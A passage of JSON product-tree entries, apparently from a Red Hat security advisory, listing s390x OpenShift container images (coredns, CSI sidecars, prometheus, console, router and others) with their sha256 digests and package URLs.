"product_id": "registry.redhat.io/openshift4/container-networking-plugins-microshift-rhel9@sha256:f607a04fbff99b8e9fe049182f651c9be0492e6534013aff0743dd5a24954051_s390x",
"product_identification_helper": {
"purl": "pkg:oci/openshift/container-networking-plugins-microshift-rhel9@sha256%3Af607a04fbff99b8e9fe049182f651c9be0492e6534013aff0743dd5a24954051?arch=s390x\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773847815"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-coredns-rhel9@sha256:c8fe680b1a191adfcce2a63df567dbe0c9a8eb29e627d58a396dba2087b8e25d_s390x",
"product": {
"name": "registry.redhat.io/openshift4/ose-coredns-rhel9@sha256:c8fe680b1a191adfcce2a63df567dbe0c9a8eb29e627d58a396dba2087b8e25d_s390x",
"product_id": "registry.redhat.io/openshift4/ose-coredns-rhel9@sha256:c8fe680b1a191adfcce2a63df567dbe0c9a8eb29e627d58a396dba2087b8e25d_s390x",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-coredns-rhel9@sha256%3Ac8fe680b1a191adfcce2a63df567dbe0c9a8eb29e627d58a396dba2087b8e25d?arch=s390x\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773846419"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-csi-external-attacher-rhel9@sha256:38e460f96e25cf1d13a7092fa9b9aa5f0b61b30217f5ffcabdec78e1fb8215f3_s390x",
"product": {
"name": "registry.redhat.io/openshift4/ose-csi-external-attacher-rhel9@sha256:38e460f96e25cf1d13a7092fa9b9aa5f0b61b30217f5ffcabdec78e1fb8215f3_s390x",
"product_id": "registry.redhat.io/openshift4/ose-csi-external-attacher-rhel9@sha256:38e460f96e25cf1d13a7092fa9b9aa5f0b61b30217f5ffcabdec78e1fb8215f3_s390x",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-csi-external-attacher-rhel9@sha256%3A38e460f96e25cf1d13a7092fa9b9aa5f0b61b30217f5ffcabdec78e1fb8215f3?arch=s390x\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773848396"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-csi-external-snapshot-metadata-rhel9@sha256:df3604d1255d191a0108b37c87dfb3674e27f1adbc6a1e73df74182b2252f900_s390x",
"product": {
"name": "registry.redhat.io/openshift4/ose-csi-external-snapshot-metadata-rhel9@sha256:df3604d1255d191a0108b37c87dfb3674e27f1adbc6a1e73df74182b2252f900_s390x",
"product_id": "registry.redhat.io/openshift4/ose-csi-external-snapshot-metadata-rhel9@sha256:df3604d1255d191a0108b37c87dfb3674e27f1adbc6a1e73df74182b2252f900_s390x",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-csi-external-snapshot-metadata-rhel9@sha256%3Adf3604d1255d191a0108b37c87dfb3674e27f1adbc6a1e73df74182b2252f900?arch=s390x\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773844472"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-csi-livenessprobe-rhel9@sha256:6dc06ddd4760393cb6737b9c259e41a33065392db9aa772d86da211e17949e16_s390x",
"product": {
"name": "registry.redhat.io/openshift4/ose-csi-livenessprobe-rhel9@sha256:6dc06ddd4760393cb6737b9c259e41a33065392db9aa772d86da211e17949e16_s390x",
"product_id": "registry.redhat.io/openshift4/ose-csi-livenessprobe-rhel9@sha256:6dc06ddd4760393cb6737b9c259e41a33065392db9aa772d86da211e17949e16_s390x",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-csi-livenessprobe-rhel9@sha256%3A6dc06ddd4760393cb6737b9c259e41a33065392db9aa772d86da211e17949e16?arch=s390x\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773846717"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-csi-node-driver-registrar-rhel9@sha256:60c0c64458e0e76742fc7b6a89a556ae479c0db8696a9ea4e26fcd761c8bcf70_s390x",
"product": {
"name": "registry.redhat.io/openshift4/ose-csi-node-driver-registrar-rhel9@sha256:60c0c64458e0e76742fc7b6a89a556ae479c0db8696a9ea4e26fcd761c8bcf70_s390x",
"product_id": "registry.redhat.io/openshift4/ose-csi-node-driver-registrar-rhel9@sha256:60c0c64458e0e76742fc7b6a89a556ae479c0db8696a9ea4e26fcd761c8bcf70_s390x",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-csi-node-driver-registrar-rhel9@sha256%3A60c0c64458e0e76742fc7b6a89a556ae479c0db8696a9ea4e26fcd761c8bcf70?arch=s390x\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773847281"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-csi-external-provisioner-rhel9@sha256:1b31ce33a1c3710bfc248e76293ed88a8eb9a250b5bd8ec39706bd54d19e3eba_s390x",
"product": {
"name": "registry.redhat.io/openshift4/ose-csi-external-provisioner-rhel9@sha256:1b31ce33a1c3710bfc248e76293ed88a8eb9a250b5bd8ec39706bd54d19e3eba_s390x",
"product_id": "registry.redhat.io/openshift4/ose-csi-external-provisioner-rhel9@sha256:1b31ce33a1c3710bfc248e76293ed88a8eb9a250b5bd8ec39706bd54d19e3eba_s390x",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-csi-external-provisioner-rhel9@sha256%3A1b31ce33a1c3710bfc248e76293ed88a8eb9a250b5bd8ec39706bd54d19e3eba?arch=s390x\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773847115"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/driver-toolkit-rhel9@sha256:d6abeb46b250118c1bc6d79a205fb2a28f1e2c87cc1782856e2b08d57726a242_s390x",
"product": {
"name": "registry.redhat.io/openshift4/driver-toolkit-rhel9@sha256:d6abeb46b250118c1bc6d79a205fb2a28f1e2c87cc1782856e2b08d57726a242_s390x",
"product_id": "registry.redhat.io/openshift4/driver-toolkit-rhel9@sha256:d6abeb46b250118c1bc6d79a205fb2a28f1e2c87cc1782856e2b08d57726a242_s390x",
"product_identification_helper": {
"purl": "pkg:oci/openshift/driver-toolkit-rhel9@sha256%3Ad6abeb46b250118c1bc6d79a205fb2a28f1e2c87cc1782856e2b08d57726a242?arch=s390x\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773707627"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/egress-router-cni-rhel9@sha256:f54a077136b77f7b7f4158ebe48dd8c327ed24f31d1f60bb74e377289c8f388d_s390x",
"product": {
"name": "registry.redhat.io/openshift4/egress-router-cni-rhel9@sha256:f54a077136b77f7b7f4158ebe48dd8c327ed24f31d1f60bb74e377289c8f388d_s390x",
"product_id": "registry.redhat.io/openshift4/egress-router-cni-rhel9@sha256:f54a077136b77f7b7f4158ebe48dd8c327ed24f31d1f60bb74e377289c8f388d_s390x",
"product_identification_helper": {
"purl": "pkg:oci/openshift/egress-router-cni-rhel9@sha256%3Af54a077136b77f7b7f4158ebe48dd8c327ed24f31d1f60bb74e377289c8f388d?arch=s390x\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773848446"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-gcp-workload-identity-federation-webhook-rhel9@sha256:854ddefe9f6d6c6a9afa3df8188f96fa05364a28ec6432ad248bcd2e457182a1_s390x",
"product": {
"name": "registry.redhat.io/openshift4/ose-gcp-workload-identity-federation-webhook-rhel9@sha256:854ddefe9f6d6c6a9afa3df8188f96fa05364a28ec6432ad248bcd2e457182a1_s390x",
"product_id": "registry.redhat.io/openshift4/ose-gcp-workload-identity-federation-webhook-rhel9@sha256:854ddefe9f6d6c6a9afa3df8188f96fa05364a28ec6432ad248bcd2e457182a1_s390x",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-gcp-workload-identity-federation-webhook-rhel9@sha256%3A854ddefe9f6d6c6a9afa3df8188f96fa05364a28ec6432ad248bcd2e457182a1?arch=s390x\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773847009"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-oauth-proxy-rhel9@sha256:145c212f961f62d710be50e24fc7a307e756b4a5e255393e003f33d3d5c91f8b_s390x",
"product": {
"name": "registry.redhat.io/openshift4/ose-oauth-proxy-rhel9@sha256:145c212f961f62d710be50e24fc7a307e756b4a5e255393e003f33d3d5c91f8b_s390x",
"product_id": "registry.redhat.io/openshift4/ose-oauth-proxy-rhel9@sha256:145c212f961f62d710be50e24fc7a307e756b4a5e255393e003f33d3d5c91f8b_s390x",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-oauth-proxy-rhel9@sha256%3A145c212f961f62d710be50e24fc7a307e756b4a5e255393e003f33d3d5c91f8b?arch=s390x\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773846532"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-prometheus-alertmanager-rhel9@sha256:9e390a25735b44286e3649b4872910720050d0f710feb67f914621db1913ce8e_s390x",
"product": {
"name": "registry.redhat.io/openshift4/ose-prometheus-alertmanager-rhel9@sha256:9e390a25735b44286e3649b4872910720050d0f710feb67f914621db1913ce8e_s390x",
"product_id": "registry.redhat.io/openshift4/ose-prometheus-alertmanager-rhel9@sha256:9e390a25735b44286e3649b4872910720050d0f710feb67f914621db1913ce8e_s390x",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-prometheus-alertmanager-rhel9@sha256%3A9e390a25735b44286e3649b4872910720050d0f710feb67f914621db1913ce8e?arch=s390x\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773847140"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-prometheus-node-exporter-rhel9@sha256:38ee956747c9e76adb8038bc81918a6fb8a800313a93cff8822d309466754b67_s390x",
"product": {
"name": "registry.redhat.io/openshift4/ose-prometheus-node-exporter-rhel9@sha256:38ee956747c9e76adb8038bc81918a6fb8a800313a93cff8822d309466754b67_s390x",
"product_id": "registry.redhat.io/openshift4/ose-prometheus-node-exporter-rhel9@sha256:38ee956747c9e76adb8038bc81918a6fb8a800313a93cff8822d309466754b67_s390x",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-prometheus-node-exporter-rhel9@sha256%3A38ee956747c9e76adb8038bc81918a6fb8a800313a93cff8822d309466754b67?arch=s390x\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773849423"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-prometheus-rhel9@sha256:5df3c4493997002d40d9278e7ef6b90fb98905a2bba169b0410980d297bfade3_s390x",
"product": {
"name": "registry.redhat.io/openshift4/ose-prometheus-rhel9@sha256:5df3c4493997002d40d9278e7ef6b90fb98905a2bba169b0410980d297bfade3_s390x",
"product_id": "registry.redhat.io/openshift4/ose-prometheus-rhel9@sha256:5df3c4493997002d40d9278e7ef6b90fb98905a2bba169b0410980d297bfade3_s390x",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-prometheus-rhel9@sha256%3A5df3c4493997002d40d9278e7ef6b90fb98905a2bba169b0410980d297bfade3?arch=s390x\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773848133"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-hypershift-rhel9@sha256:3990f7f0d2e505ec391fe3056a175d985b5f508642740bcbf8b61fabf6ecda75_s390x",
"product": {
"name": "registry.redhat.io/openshift4/ose-hypershift-rhel9@sha256:3990f7f0d2e505ec391fe3056a175d985b5f508642740bcbf8b61fabf6ecda75_s390x",
"product_id": "registry.redhat.io/openshift4/ose-hypershift-rhel9@sha256:3990f7f0d2e505ec391fe3056a175d985b5f508642740bcbf8b61fabf6ecda75_s390x",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-hypershift-rhel9@sha256%3A3990f7f0d2e505ec391fe3056a175d985b5f508642740bcbf8b61fabf6ecda75?arch=s390x\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773849362"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-kube-proxy-rhel9@sha256:27255764d47f35147d02850500d774d54c4216c802d2cfb01c0ab555540a85f3_s390x",
"product": {
"name": "registry.redhat.io/openshift4/ose-kube-proxy-rhel9@sha256:27255764d47f35147d02850500d774d54c4216c802d2cfb01c0ab555540a85f3_s390x",
"product_id": "registry.redhat.io/openshift4/ose-kube-proxy-rhel9@sha256:27255764d47f35147d02850500d774d54c4216c802d2cfb01c0ab555540a85f3_s390x",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-kube-proxy-rhel9@sha256%3A27255764d47f35147d02850500d774d54c4216c802d2cfb01c0ab555540a85f3?arch=s390x\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773848743"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-kube-rbac-proxy-rhel9@sha256:18ac01a31557a6a6b97d34d8cae22ffbd27e3f9ec3d5f63e45c78cbf07020044_s390x",
"product": {
"name": "registry.redhat.io/openshift4/ose-kube-rbac-proxy-rhel9@sha256:18ac01a31557a6a6b97d34d8cae22ffbd27e3f9ec3d5f63e45c78cbf07020044_s390x",
"product_id": "registry.redhat.io/openshift4/ose-kube-rbac-proxy-rhel9@sha256:18ac01a31557a6a6b97d34d8cae22ffbd27e3f9ec3d5f63e45c78cbf07020044_s390x",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-kube-rbac-proxy-rhel9@sha256%3A18ac01a31557a6a6b97d34d8cae22ffbd27e3f9ec3d5f63e45c78cbf07020044?arch=s390x\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773849626"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-kube-state-metrics-rhel9@sha256:92a8781fdc3b5f1db9a5c578b6685dc56093a1d5c273ee3abc6270ee9400387e_s390x",
"product": {
"name": "registry.redhat.io/openshift4/ose-kube-state-metrics-rhel9@sha256:92a8781fdc3b5f1db9a5c578b6685dc56093a1d5c273ee3abc6270ee9400387e_s390x",
"product_id": "registry.redhat.io/openshift4/ose-kube-state-metrics-rhel9@sha256:92a8781fdc3b5f1db9a5c578b6685dc56093a1d5c273ee3abc6270ee9400387e_s390x",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-kube-state-metrics-rhel9@sha256%3A92a8781fdc3b5f1db9a5c578b6685dc56093a1d5c273ee3abc6270ee9400387e?arch=s390x\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773847270"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-operator-marketplace-rhel9@sha256:02e33310f537d87191e72aa16de4bc7bbedcead6befdf0e686f9d08005df3872_s390x",
"product": {
"name": "registry.redhat.io/openshift4/ose-operator-marketplace-rhel9@sha256:02e33310f537d87191e72aa16de4bc7bbedcead6befdf0e686f9d08005df3872_s390x",
"product_id": "registry.redhat.io/openshift4/ose-operator-marketplace-rhel9@sha256:02e33310f537d87191e72aa16de4bc7bbedcead6befdf0e686f9d08005df3872_s390x",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-operator-marketplace-rhel9@sha256%3A02e33310f537d87191e72aa16de4bc7bbedcead6befdf0e686f9d08005df3872?arch=s390x\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773849009"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-monitoring-plugin-rhel9@sha256:33db1ea4989248c3760120da28f516110c25bec461090bed2b200505b3357470_s390x",
"product": {
"name": "registry.redhat.io/openshift4/ose-monitoring-plugin-rhel9@sha256:33db1ea4989248c3760120da28f516110c25bec461090bed2b200505b3357470_s390x",
"product_id": "registry.redhat.io/openshift4/ose-monitoring-plugin-rhel9@sha256:33db1ea4989248c3760120da28f516110c25bec461090bed2b200505b3357470_s390x",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-monitoring-plugin-rhel9@sha256%3A33db1ea4989248c3760120da28f516110c25bec461090bed2b200505b3357470?arch=s390x\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773849532"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-multus-cni-rhel9@sha256:b7fe49c50219736630f128889b00b583d41a09297ac6888e2cf5d4f8b3f6aa54_s390x",
"product": {
"name": "registry.redhat.io/openshift4/ose-multus-cni-rhel9@sha256:b7fe49c50219736630f128889b00b583d41a09297ac6888e2cf5d4f8b3f6aa54_s390x",
"product_id": "registry.redhat.io/openshift4/ose-multus-cni-rhel9@sha256:b7fe49c50219736630f128889b00b583d41a09297ac6888e2cf5d4f8b3f6aa54_s390x",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-multus-cni-rhel9@sha256%3Ab7fe49c50219736630f128889b00b583d41a09297ac6888e2cf5d4f8b3f6aa54?arch=s390x\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773844761"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-multus-cni-microshift-rhel9@sha256:43b10a72c5d7f3e182414dc3edebe2ebeeb2a4af0c4349a65e49e5bb1a789ba2_s390x",
"product": {
"name": "registry.redhat.io/openshift4/ose-multus-cni-microshift-rhel9@sha256:43b10a72c5d7f3e182414dc3edebe2ebeeb2a4af0c4349a65e49e5bb1a789ba2_s390x",
"product_id": "registry.redhat.io/openshift4/ose-multus-cni-microshift-rhel9@sha256:43b10a72c5d7f3e182414dc3edebe2ebeeb2a4af0c4349a65e49e5bb1a789ba2_s390x",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-multus-cni-microshift-rhel9@sha256%3A43b10a72c5d7f3e182414dc3edebe2ebeeb2a4af0c4349a65e49e5bb1a789ba2?arch=s390x\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773849379"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-multus-networkpolicy-rhel9@sha256:15e5091704189fa9c3e99b69ca9755ede680de717143e7458179826b7211bba7_s390x",
"product": {
"name": "registry.redhat.io/openshift4/ose-multus-networkpolicy-rhel9@sha256:15e5091704189fa9c3e99b69ca9755ede680de717143e7458179826b7211bba7_s390x",
"product_id": "registry.redhat.io/openshift4/ose-multus-networkpolicy-rhel9@sha256:15e5091704189fa9c3e99b69ca9755ede680de717143e7458179826b7211bba7_s390x",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-multus-networkpolicy-rhel9@sha256%3A15e5091704189fa9c3e99b69ca9755ede680de717143e7458179826b7211bba7?arch=s390x\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773847787"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-networking-console-plugin-rhel9@sha256:e9ab761cb5e82d2de804f0d95bf729601f2324d8bc11519c17cee964c55799c1_s390x",
"product": {
"name": "registry.redhat.io/openshift4/ose-networking-console-plugin-rhel9@sha256:e9ab761cb5e82d2de804f0d95bf729601f2324d8bc11519c17cee964c55799c1_s390x",
"product_id": "registry.redhat.io/openshift4/ose-networking-console-plugin-rhel9@sha256:e9ab761cb5e82d2de804f0d95bf729601f2324d8bc11519c17cee964c55799c1_s390x",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-networking-console-plugin-rhel9@sha256%3Ae9ab761cb5e82d2de804f0d95bf729601f2324d8bc11519c17cee964c55799c1?arch=s390x\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773849485"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-oauth-server-rhel9@sha256:35d92ed2b2bd3a721f928330e6a5edd25629fbb203db91f62b650e787be215d2_s390x",
"product": {
"name": "registry.redhat.io/openshift4/ose-oauth-server-rhel9@sha256:35d92ed2b2bd3a721f928330e6a5edd25629fbb203db91f62b650e787be215d2_s390x",
"product_id": "registry.redhat.io/openshift4/ose-oauth-server-rhel9@sha256:35d92ed2b2bd3a721f928330e6a5edd25629fbb203db91f62b650e787be215d2_s390x",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-oauth-server-rhel9@sha256%3A35d92ed2b2bd3a721f928330e6a5edd25629fbb203db91f62b650e787be215d2?arch=s390x\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773849032"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/oc-mirror-plugin-rhel9@sha256:20544c6de0614e3e195c9f45aea764132229c619228fa4483f7e418297b96ff6_s390x",
"product": {
"name": "registry.redhat.io/openshift4/oc-mirror-plugin-rhel9@sha256:20544c6de0614e3e195c9f45aea764132229c619228fa4483f7e418297b96ff6_s390x",
"product_id": "registry.redhat.io/openshift4/oc-mirror-plugin-rhel9@sha256:20544c6de0614e3e195c9f45aea764132229c619228fa4483f7e418297b96ff6_s390x",
"product_identification_helper": {
"purl": "pkg:oci/openshift/oc-mirror-plugin-rhel9@sha256%3A20544c6de0614e3e195c9f45aea764132229c619228fa4483f7e418297b96ff6?arch=s390x\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773846953"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-docker-builder-rhel9@sha256:ee26deea807e27278f4286dcc3d62a2ac54dcd75e52b20150c943d5556367222_s390x",
"product": {
"name": "registry.redhat.io/openshift4/ose-docker-builder-rhel9@sha256:ee26deea807e27278f4286dcc3d62a2ac54dcd75e52b20150c943d5556367222_s390x",
"product_id": "registry.redhat.io/openshift4/ose-docker-builder-rhel9@sha256:ee26deea807e27278f4286dcc3d62a2ac54dcd75e52b20150c943d5556367222_s390x",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-docker-builder-rhel9@sha256%3Aee26deea807e27278f4286dcc3d62a2ac54dcd75e52b20150c943d5556367222?arch=s390x\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773844600"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-cli-rhel9@sha256:981dfbf55ceaaaca41ec375ff1a95db0409f443ed70dc84859545af82668280c_s390x",
"product": {
"name": "registry.redhat.io/openshift4/ose-cli-rhel9@sha256:981dfbf55ceaaaca41ec375ff1a95db0409f443ed70dc84859545af82668280c_s390x",
"product_id": "registry.redhat.io/openshift4/ose-cli-rhel9@sha256:981dfbf55ceaaaca41ec375ff1a95db0409f443ed70dc84859545af82668280c_s390x",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-cli-rhel9@sha256%3A981dfbf55ceaaaca41ec375ff1a95db0409f443ed70dc84859545af82668280c?arch=s390x\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773849329"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-console-rhel9@sha256:aca9a52fb5a895ab113232b967887b942882b83e0e8902c269214df95173a386_s390x",
"product": {
"name": "registry.redhat.io/openshift4/ose-console-rhel9@sha256:aca9a52fb5a895ab113232b967887b942882b83e0e8902c269214df95173a386_s390x",
"product_id": "registry.redhat.io/openshift4/ose-console-rhel9@sha256:aca9a52fb5a895ab113232b967887b942882b83e0e8902c269214df95173a386_s390x",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-console-rhel9@sha256%3Aaca9a52fb5a895ab113232b967887b942882b83e0e8902c269214df95173a386?arch=s390x\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773849670"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-console-rhel9-operator@sha256:e77e4ba2ca054937f43d56ea54ed53df29fb55179879064a83ab078660c6c9f7_s390x",
"product": {
"name": "registry.redhat.io/openshift4/ose-console-rhel9-operator@sha256:e77e4ba2ca054937f43d56ea54ed53df29fb55179879064a83ab078660c6c9f7_s390x",
"product_id": "registry.redhat.io/openshift4/ose-console-rhel9-operator@sha256:e77e4ba2ca054937f43d56ea54ed53df29fb55179879064a83ab078660c6c9f7_s390x",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-console-rhel9-operator@sha256%3Ae77e4ba2ca054937f43d56ea54ed53df29fb55179879064a83ab078660c6c9f7?arch=s390x\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773849553"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-deployer-rhel9@sha256:c6ffe0b9527d2431a8cb3aa16e0f353e5f715278ed48282ac33be339a704bdda_s390x",
"product": {
"name": "registry.redhat.io/openshift4/ose-deployer-rhel9@sha256:c6ffe0b9527d2431a8cb3aa16e0f353e5f715278ed48282ac33be339a704bdda_s390x",
"product_id": "registry.redhat.io/openshift4/ose-deployer-rhel9@sha256:c6ffe0b9527d2431a8cb3aa16e0f353e5f715278ed48282ac33be339a704bdda_s390x",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-deployer-rhel9@sha256%3Ac6ffe0b9527d2431a8cb3aa16e0f353e5f715278ed48282ac33be339a704bdda?arch=s390x\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773850898"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-haproxy-router-rhel9@sha256:e8badf78c7d338c04dc43be33d6de5484c70d2d60388d26b77bbed2ffa2f7071_s390x",
"product": {
"name": "registry.redhat.io/openshift4/ose-haproxy-router-rhel9@sha256:e8badf78c7d338c04dc43be33d6de5484c70d2d60388d26b77bbed2ffa2f7071_s390x",
"product_id": "registry.redhat.io/openshift4/ose-haproxy-router-rhel9@sha256:e8badf78c7d338c04dc43be33d6de5484c70d2d60388d26b77bbed2ffa2f7071_s390x",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-haproxy-router-rhel9@sha256%3Ae8badf78c7d338c04dc43be33d6de5484c70d2d60388d26b77bbed2ffa2f7071?arch=s390x\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773850450"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-hyperkube-rhel9@sha256:c9b03caecf5048cc37952df8194ddb113de62bdb7ebbb8a927a3299e1e3975b6_s390x",
"product": {
"name": "registry.redhat.io/openshift4/ose-hyperkube-rhel9@sha256:c9b03caecf5048cc37952df8194ddb113de62bdb7ebbb8a927a3299e1e3975b6_s390x",
"product_id": "registry.redhat.io/openshift4/ose-hyperkube-rhel9@sha256:c9b03caecf5048cc37952df8194ddb113de62bdb7ebbb8a927a3299e1e3975b6_s390x",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-hyperkube-rhel9@sha256%3Ac9b03caecf5048cc37952df8194ddb113de62bdb7ebbb8a927a3299e1e3975b6?arch=s390x\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773848413"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-keepalived-ipfailover-rhel9@sha256:be44136cdbbda20d1628aefa40838aceeb7d0a6009e4e182ea886ae561e5df68_s390x",
"product": {
"name": "registry.redhat.io/openshift4/ose-keepalived-ipfailover-rhel9@sha256:be44136cdbbda20d1628aefa40838aceeb7d0a6009e4e182ea886ae561e5df68_s390x",
"product_id": "registry.redhat.io/openshift4/ose-keepalived-ipfailover-rhel9@sha256:be44136cdbbda20d1628aefa40838aceeb7d0a6009e4e182ea886ae561e5df68_s390x",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-keepalived-ipfailover-rhel9@sha256%3Abe44136cdbbda20d1628aefa40838aceeb7d0a6009e4e182ea886ae561e5df68?arch=s390x\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773848686"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-pod-rhel9@sha256:251e0b536826e5353396f8069d508ef5f9cba6c38bc66be2aee9037759228834_s390x",
"product": {
"name": "registry.redhat.io/openshift4/ose-pod-rhel9@sha256:251e0b536826e5353396f8069d508ef5f9cba6c38bc66be2aee9037759228834_s390x",
"product_id": "registry.redhat.io/openshift4/ose-pod-rhel9@sha256:251e0b536826e5353396f8069d508ef5f9cba6c38bc66be2aee9037759228834_s390x",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-pod-rhel9@sha256%3A251e0b536826e5353396f8069d508ef5f9cba6c38bc66be2aee9037759228834?arch=s390x\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773849386"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-docker-registry-rhel9@sha256:b813e2c74a2180534b64eba9e4847ce7799f2c6b36cc91d429d0f3ea7e8d8e6d_s390x",
"product": {
"name": "registry.redhat.io/openshift4/ose-docker-registry-rhel9@sha256:b813e2c74a2180534b64eba9e4847ce7799f2c6b36cc91d429d0f3ea7e8d8e6d_s390x",
"product_id": "registry.redhat.io/openshift4/ose-docker-registry-rhel9@sha256:b813e2c74a2180534b64eba9e4847ce7799f2c6b36cc91d429d0f3ea7e8d8e6d_s390x",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-docker-registry-rhel9@sha256%3Ab813e2c74a2180534b64eba9e4847ce7799f2c6b36cc91d429d0f3ea7e8d8e6d?arch=s390x\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773847640"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-openshift-state-metrics-rhel9@sha256:ff3f16308fcee12fe291fdc043366343c88bd30b9b449b646e548d36d3872077_s390x",
"product": {
"name": "registry.redhat.io/openshift4/ose-openshift-state-metrics-rhel9@sha256:ff3f16308fcee12fe291fdc043366343c88bd30b9b449b646e548d36d3872077_s390x",
"product_id": "registry.redhat.io/openshift4/ose-openshift-state-metrics-rhel9@sha256:ff3f16308fcee12fe291fdc043366343c88bd30b9b449b646e548d36d3872077_s390x",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-openshift-state-metrics-rhel9@sha256%3Aff3f16308fcee12fe291fdc043366343c88bd30b9b449b646e548d36d3872077?arch=s390x\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773847832"
}
}
},
{
